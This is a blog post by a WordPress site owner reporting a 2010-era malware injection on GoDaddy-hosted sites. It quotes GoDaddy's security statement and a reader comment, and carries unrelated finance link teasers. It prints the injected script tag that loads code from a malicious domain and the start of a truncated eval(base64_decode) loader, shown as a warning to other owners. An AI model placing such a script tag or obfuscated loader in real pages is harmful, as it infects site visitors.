There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="https://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!
If you’re on GoDaddy Server & hosted WordPress Website, a major malware infection is going around. Kindly check yours and get solved soon!
Related Readings and Observations
How my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.- Backtest your Pair Trading Strategies – Amibroker AFL code Today, pairs trading is often conducted using algorithmic trading strategies(Rule based) on an Execution Management System. These strategies are typically built around mathematical models […]
- Confidence Petroleum India Ltd : Multibagger Recommendation Scripscan:Confidence Petroleum India LtdCmp: Rs14.35Code: 526829 Story:-Presently its quoting at 14 odd rs.Confidence has rejuveneated itself and the company presently is all set to become […]
- The History of Credit Cards Credit is a method of selling goods or services without the buyer having cash in hand. A credit card is only an automatic way of offering credit to a consumer. Today, every credit card […]
- Using Sharpe ratio for MF investing Interesting Article Extracted from Hindu about Sharpe Ratio RETAIL investors have taken to mutual funds in a big way. It is, thus, small wonder that we have so many funds to choose […]
- Simple Triple Moving Average Crossover – Amibroker AFL Code Here is the very simple and classical example to build a triple EMA (Exponential Moving Average Crossover system). System is quite popular if anyone (trader/investor) is a newbie to […]
An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.
Thank you,
Todd Redfoot
Go Daddy Chief Information Security Officer
Hi Rajandran R,
I guess you could have used the steps given in this link…
http://hubpages.com/hub/Godaddy-Malware-Issue-Fixed
dont know how the hell they made this good tool, but it works for sure…
We surely need some more people like these… 🙂